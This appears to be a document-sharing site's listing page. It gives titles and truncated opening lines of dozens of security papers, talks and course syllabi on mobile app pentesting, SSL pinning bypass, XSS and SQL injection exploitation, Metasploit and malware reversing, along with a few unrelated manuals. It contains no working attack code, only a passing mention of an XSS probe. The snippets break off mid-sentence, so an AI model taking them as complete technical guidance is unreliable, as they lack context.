Mobile security, forensics & malware analysis with Santoku Linux PRESENTER - ANDREW HOOG CEO/Co-founder of viaforensics Andrew is a published author, computer scientist, and mobile security & forensics
ABSTRACT' INTRODUCTION' COMMON'SECURITY'MISTAKES'' Reverse Engineering ios Applications
Reverse Engineering ios Applications Drew Branch, Independent Security Evaluators, Associate Security Analyst ABSTRACT' Mobile applications are a part of nearly everyone s life, and most use multiple mobile
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
Threat Modeling/ Security Testing. Tarun Banga, Adobe 1. Agenda
Threat Modeling/ Security Testing Presented by: Tarun Banga Sr. Manager Quality Engineering, Adobe Quality Leader (India) Adobe Systems India Pvt. Ltd. Agenda Security Principles Why Security Testing Security
TACKYDROID. Pentesting Android Applications in Style
TACKYDROID Pentesting Android Applications in Style THIS TALK IS ABOUT AN APP WE ARE MAKING This talk IS NOT about Android platform itself This talk IS about how we want to contribute auditing apps that
Bypassing SSL Pinning on Android via Reverse Engineering
Bypassing SSL Pinning on Android via Reverse Engineering Denis Andzakovic Security-Assessment.com 15 May 2014 Table of Contents Bypassing SSL Pinning on Android via Reverse Engineering... 1 Introduction...
BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note
BlackBerry Enterprise Service 10 Secure Work Space for ios and Android Version: 10.1.1 Security Note Published: 2013-06-21 SWD-20130621110651069 Contents 1 About this guide...4 2 What is BlackBerry Enterprise
SYLLABUS MOBILE APPLICATION SECURITY AND PENETRATION TESTING. MASPT at a glance: v1.0 (28/01/2014) 10 highly practical modules
Must have skills in any penetration tester's arsenal. MASPT at a glance: 10 highly practical modules 4 hours of video material 1200+ interactive slides 20 Applications to practice with Leads to emapt certification
IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection
IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection Description Lab flow At the end of this lab, you should be able to Discover how to harness the power and capabilities
Smartphone Pentest Framework v0.1. User Guide
Smartphone Pentest Framework v0.1 User Guide 1 Introduction: The Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed
Studying Security Weaknesses of Android System
, pp. 7-12 http://dx.doi.org/10.14257/ijsia.2015.9.3.02 Studying Security Weaknesses of Android System Jae-Kyung Park* and Sang-Yong Choi** *Chief researcher at Cyber Security Research Center, Korea Advanced
MS Enterprise Library 5.0 (Logging Application Block)
International Journal of Scientific and Research Publications, Volume 4, Issue 8, August 2014 1 MS Enterprise Library 5.0 (Logging Application Block) Anubhav Tiwari * R&D Dept., Syscom Corporation Ltd.
Android Programming and Security
Android Programming and Security Dependable and Secure Systems Andrea Saracino [email protected] Outlook (1) The Android Open Source Project Philosophy Players Outlook (2) Part I: Android System
Topics in Network Security
Topics in Network Security Jem Berkes MASc. ECE, University of Waterloo B.Sc. ECE, University of Manitoba www.berkes.ca February, 2009 Ver. 2 In this presentation Wi-Fi security (802.11) Protecting insecure
Comparing Application Security Tools
Comparing Application Security Tools Defcon 15-8/3/2007 Eddie Lee Fortify Software Agenda Intro to experiment Methodology to reproduce experiment on your own Results from my experiment Conclusions Introduction
Dirty use of USSD codes in cellular networks
.. Dirty use of USSD codes in cellular networks Ravishankar Borgaonkar Security in Telecommunications, Technische Universität Berlin TelcoSecDay, Heidelberg, 12th March 2013 Agenda USSD codes and services
Pentesting iphone Applications. Satishb3 http://www.securitylearn.net
Pentesting iphone Applications Satishb3 http://www.securitylearn.net Agenda iphone App Basics App development App distribution Pentesting iphone Apps Methodology Areas of focus Major Mobile Threats Who
Tutorial on Smartphone Security
Tutorial on Smartphone Security Wenliang (Kevin) Du Professor [email protected] Smartphone Usage Smartphone Applications Overview» Built-in Protections (ios and Android)» Jailbreaking and Rooting» Security
Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only
Conducting Web Application Pentests From Scoping to Report For Education Purposes Only Web App Pen Tests According to OWASP: A Web Application Penetration Test focuses only on evaluating the security of
Understanding Android s Security Framework
Understanding Android s Security Framework William Enck and Patrick McDaniel Tutorial October 2008 Systems and Internet Infrastructure Security Laboratory (SIIS) 1 2 Telecommunications Nets. The telecommunications
Developing for MSI Android Devices
Android Application Development Enterprise Features October 2013 Developing for MSI Android Devices Majority is the same as developing for any Android device Fully compatible with Android SDK We test using
ANDROID APPS DEVELOPMENT FOR MOBILE AND TABLET DEVICE (LEVEL I)
ANDROID APPS DEVELOPMENT FOR MOBILE AND TABLET DEVICE (LEVEL I) Who am I? Lo Chi Wing, Peter Lecture 1: Introduction to Android Development Email: [email protected] Facebook: http://www.facebook.com/peterlo111
Pentesting Mobile Applications
WEB 应 用 安 全 和 数 据 库 安 全 的 领 航 者! 安 恒 信 息 技 术 有 限 公 司 Pentesting Mobile Applications www.dbappsecurity.com.cn Who am I l Frank Fan: CTO of DBAPPSecurity Graduated from California State University as a Computer
Android Development. Marc Mc Loughlin
Android Development Marc Mc Loughlin Android Development Android Developer Website:h:p://developer.android.com/ Dev Guide Reference Resources Video / Blog SeCng up the SDK h:p://developer.android.com/sdk/
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
STABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
WHY DOES MY SPEED MONITORING GRAPH SHOW -1 IN THE TOOLTIP? 2 HOW CAN I CHANGE MY PREFERENCES FOR UPTIME AND SPEED MONITORING 2
FAQ WHY DOES MY SPEED MONITORING GRAPH SHOW -1 IN THE TOOLTIP? 2 HOW CAN I CHANGE MY PREFERENCES FOR UPTIME AND SPEED MONITORING 2 WHAT IS UPTIME AND SPEED MONITORING 2 WHEN I TRY TO SELECT A SERVICE FROM
Reversing Android Malware
Reversing Android Malware The Honeynet Project 10 th Annual Workshop ESIEA PARIS.FR 2011-03-21 MAHMUD AB RAHMAN (MyCERT, CyberSecurity Malaysia) Copyright 2011 CyberSecurity Malaysia MYSELF Mahmud Ab Rahman
CLC Server Command Line Tools USER MANUAL
CLC Server Command Line Tools USER MANUAL Manual for CLC Server Command Line Tools 2.5 Windows, Mac OS X and Linux September 4, 2015 This software is for research purposes only. QIAGEN Aarhus A/S Silkeborgvej
How to hack a website with Metasploit
How to hack a website with Metasploit By Sumedt Jitpukdebodin Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability services in the target server or to create a payload to make
Agenda. SQL Injection Impact in the Real World. 8.1. Attack Scenario (1) CHAPTER 8 SQL Injection
Agenda CHAPTER 8 SQL Injection Slides adapted from "Foundations of Security: What Every Programmer Needs To Know" by Neil Daswani, Christoph Kern, and Anita Kesavan (ISBN 1590597842; http://www.foundationsofsecurity.com).
Vulnerability analysis
Vulnerability analysis License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents License Contents
Assessing BYOD with the Smarthpone Pentest Framework. Georgia Weidman
Assessing BYOD with the Smarthpone Pentest Framework Georgia Weidman BYOD Is Not New Contractor Laptop Rogue Access Point Gaming Console Tradi>onal Vulnerability Scanning The iphone in Ques>on Is
getsharedpreferences() - Use this if you need multiple preferences files identified by name, which you specify with the first parameter.
Android Storage Stolen from: developer.android.com data-storage.html i Data Storage Options a) Shared Preferences b) Internal Storage c) External Storage d) SQLite Database e) Network Connection ii Shared
Hey, We Catch You: Dynamic Analysis of Android Applications. Wenjun Hu(MindMac) PacSec, Tokyo 2014.11
Hey, We Catch You: Dynamic Analysis of Android Applications Wenjun Hu(MindMac) PacSec, Tokyo 2014.11 Recent years witness the colossal growth of Android malware Vanja Svajcer, SophosLabs, Sophos Mobile
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework [email protected] keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
Penetration Testing for iphone Applications Part 1
Penetration Testing for iphone Applications Part 1 This article focuses specifically on the techniques and tools that will help security professionals understand penetration testing methods for iphone
Android Security Joshua Hodosh and Tim Leek
Android Security Joshua Hodosh and Tim Leek This work is sponsored under Air Force contract FA8721-05-C-0002. Opinions, interpretations, conclusions, and recommendations are those of the authors and are
Advanced Endpoint Protection Overview
Advanced Endpoint Protection Overview Advanced Endpoint Protection is a solution that prevents Advanced Persistent Threats (APTs) and Zero-Day attacks and enables protection of your endpoints by blocking
Securing Secure Browsers
Securing Secure Browsers SESSION ID: TRM-T11 Prashant Kumar Verma Sr. Consultant & Head (Security Testing) Paladion Networks @prashantverma21 Agenda Browser Threats Secure Browsers to address threats Secure
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Mobile Application Security
Mobile Application Security Jack Mannino Anand Vemuri June 25, 2015 About Us Jack Mannino CEO at nvisium UI and UX development impaired Enjoys: Scala, Elixir Tolerates: Java Allergic To: Cats, Pollen,.NET
ASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
Android Security. Device Management and Security. by Stephan Linzner & Benjamin Reimold
Android Security Device Management and Security by Stephan Linzner & Benjamin Reimold Introducing Stephan Linzner Benjamin Reimold Consultant, Software Engineer Mobile Developer Founder of Stuttgart GTUG
The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
A Study of Android Application Security
A Study of Android Application Security William Enck, Damien Octeau, Patrick McDaniel, and Swarat Chaudhuri USENIX Security Symposium August 2011 Systems and Internet Infrastructure Security Laboratory
Virtually Pwned Pentesting VMware. Claudio Criscione @paradoxengine [email protected]
Virtually Pwned Pentesting VMware Claudio Criscione @paradoxengine [email protected] /me Claudio Criscione The need for security Breaking virtualization means hacking the underlying layer accessing
WordPress Security Scan Configuration
WordPress Security Scan Configuration To configure the - WordPress Security Scan - plugin in your WordPress driven Blog, login to WordPress as administrator, by simply entering the url_of_your_website/wp-admin
Advanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
All Your Code Belongs To Us Dismantling Android Secrets With CodeInspect. Steven Arzt. 04.10.2015 Secure Software Engineering Group Steven Arzt 1
All Your Code Belongs To Us Dismantling Android Secrets With CodeInspect Steven Arzt 04.10.2015 Secure Software Engineering Group Steven Arzt 1 04.10.2015 Secure Software Engineering Group Steven Arzt
Fairsail REST API: Guide for Developers
Fairsail REST API: Guide for Developers Version 1.02 FS-API-REST-PG-201509--R001.02 Fairsail 2015. All rights reserved. This document contains information proprietary to Fairsail and may not be reproduced,
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Still Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair [email protected] COO, Aspect Security [email protected] Copyright 2007 - The Foundation This work is available
Mobile Application Security Testing ASSESSMENT & CODE REVIEW
Mobile Application Security Testing ASSESSMENT & CODE REVIEW Sept. 31 st 2014 Presenters ITAC 2014 Bishop Fox Francis Brown Partner Joe DeMesy Security Associate 2 Introductions FRANCIS BROWN Hi, I m Fran
NAS 242 Using AiMaster on Your Mobile Devices
NAS 242 Using AiMaster on Your Mobile Devices Learn to use AiMaster on your mobile devices A S U S T O R C O L L E G E COURSE OBJECTIVES Upon completion of this course you should be able to: 1. Use AiMaster
System Security Guide for Snare Server v7.0
System Security Guide for Snare Server v7.0 Intersect Alliance International Pty Ltd. All rights reserved worldwide. Intersect Alliance Pty Ltd shall not be liable for errors contained herein or for direct,
Threat Intelligence Pty Ltd [email protected] 1300 809 437. Specialist Security Training Catalogue
Threat Intelligence Pty Ltd [email protected] 1300 809 437 Specialist Security Training Catalogue Did you know that the faster you detect a security breach, the lesser the impact to the organisation?
IceWarp to IceWarp Server Migration
IceWarp to IceWarp Server Migration Registered Trademarks iphone, ipad, Mac, OS X are trademarks of Apple Inc., registered in the U.S. and other countries. Microsoft, Windows, Outlook and Windows Phone
Overview of CS 282 & Android
Overview of CS 282 & Android Douglas C. Schmidt [email protected] www.dre.vanderbilt.edu/~schmidt Institute for Software Integrated Systems Vanderbilt University Nashville, Tennessee, USA CS 282
From Rivals to BFF: WAF & VA Unite OWASP 07.23.2009. The OWASP Foundation http://www.owasp.org
From Rivals to BFF: WAF & VA Unite 07.23.2009 Brian Contos, Chief Security Strategist Imperva Inc. [email protected] +1 (650) 832.6054 Copyright The Foundation Permission is granted to copy, distribute
Mobile Application Security and Penetration Testing Syllabus
Mobile Application Security and Penetration Testing Syllabus Mobile Devices Overview 1.1. Mobile Platforms 1.1.1.Android 1.1.2.iOS 1.2. Why Mobile Security 1.3. Taxonomy of Security Threats 1.3.1.OWASP
Messing with the Android Runtime
Northeastern University Systems Security Lab Messing with the Android Runtime Collin Mulliner, April 26th 2013, Singapore crm[at]ccs.neu.edu SyScan Singapore 2013 $ finger [email protected] 'postdoc'
Penetration Testing Using The Kill Chain Methodology
Penetration Testing Using The Kill Chain Methodology Presented by: Rupert Edwards This course is intended for a technically astute audience.this course is 98% hands on.the attendee should have some basic
Sophos Mobile Control Administrator guide. Product version: 3.6
Sophos Mobile Control Administrator guide Product version: 3.6 Document date: November 2013 Contents 1 About Sophos Mobile Control...4 2 About the Sophos Mobile Control web console...7 3 Key steps for
